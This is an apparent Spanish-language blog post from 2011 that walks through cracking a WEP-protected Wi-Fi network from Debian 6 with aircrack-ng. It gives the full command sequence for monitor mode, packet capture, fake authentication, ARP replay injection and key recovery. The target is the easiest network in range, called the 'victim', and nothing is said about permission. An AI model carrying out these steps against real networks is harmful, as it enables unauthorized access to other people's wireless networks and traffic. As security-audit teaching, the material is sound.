jueves, 24 de marzo de 2011

Auditoría Wifi-web desde Debian 6

Hola! En los repositorios de Debian 6 no se encuentra el paquete aircrack, usado para estos menesteres, por lo que será preciso instalarlo de forma alternativa. En próximos post espero detallar el proceso que yo empleé.
Una vez instalado el conjunto de programas que forman el aircrack, seguimos el siguiente proceso:

1-Abrir 3 terminales y logarse en todos como root, con el siguiente comando:
#su root
(clave que sea)
2-Terminal 1: Activar modo monitor de la tarjeta de red. wlan0 es el nombre de nuestro dispositivo:
#airmon-ng start wlan0
3-Nos saldrá un listado detallado de los dispositivos virtuales asociados a la tarjeta de red. Nos quedamos con el nombre del que queda marcado como monitor activo.
4-Terminal 1: Vemos el nuestra dirección mac anotando dentro de la información mostrada por el comando:
#ifconfig
5-Terminal 1: Localización de redes al alcance. El dispositivo indicado es el visto en el punto anterior.
#airodump-ng mon7
6-Dejamos que el programa trabaje un ratillo y vemos cuales de las redes monitorizadas tiene encriptación web y un mayor valor en el campo Data. Esta será la más fácil de crackear. Apuntamos su canal y su dirección mac.
7-Terminal 2: Comenzamos la captura de datos de la red seleccionada:
#airodump-ng -w salida.out --channel N --bssid vv:vv:vv:vv:vv:vv mon7
Donde:
N es el número del canal apuntado en el paso 6
vv:vv:vv:vv:vv:vv es la dirección mac de la víctima.
Ya estamos capturando datos. Hemos de prestar atención al campo Data, será el que intentamos que alcance un valor decente, minimo 5000, ideal 10000-15000, suele sobrar con 20000.
8-Terminal 1: Matamos el proceso de monitorización con control+C.
9-Terminal 1: Lanzamos la identificación para la retroalimentación. Esto lo hacemos asociandonos al punto de acceso mediante una autentificación falsa:
#aireplay-ng -1 64 -a vv:vv:vv:vv:vv:vv -h aa:aa:aa:aa:aa:aa mon7
Donde:
vv:vv:vv:vv:vv:vv es la dirección mac de la víctima.
aa:aa:aa:aa:aa:aa es la dirección mac del atacante (nosotros).
Si este proceso termina bien pasamos al siguiente paso. Esto sucederá cuanto tengamos un mensaje como 'Association successful :-)'
10-Terminal 1: Lanzamos el proceso de retroalimentación:
#aireplay-ng -3 -b vv:vv:vv:vv:vv:vv -h aa:aa:aa:aa:aa:aa mon7
11-Terminal 3: Una vez alcanzado un valor decente de capturas (ver punto 7), podemos comenzar a crackear los paquetes sin que la captura deje de funcionar:
#aircrack-ng salida*.cap
12-Terminal 3: Una vez encontrada la clave nos mostrará el mensaje:
KEY FOUND! [ 77:EA:B6:5B:C7:DE:ED:7C:B5:6B:AE:77:B6 ]
Donde la clave se muestra en formato hexaecimal.
13-Paramos los procesos con control+c y cerramos los terminales.
14-Ya está!

=:)

No hay comentarios:

Publicar un comentario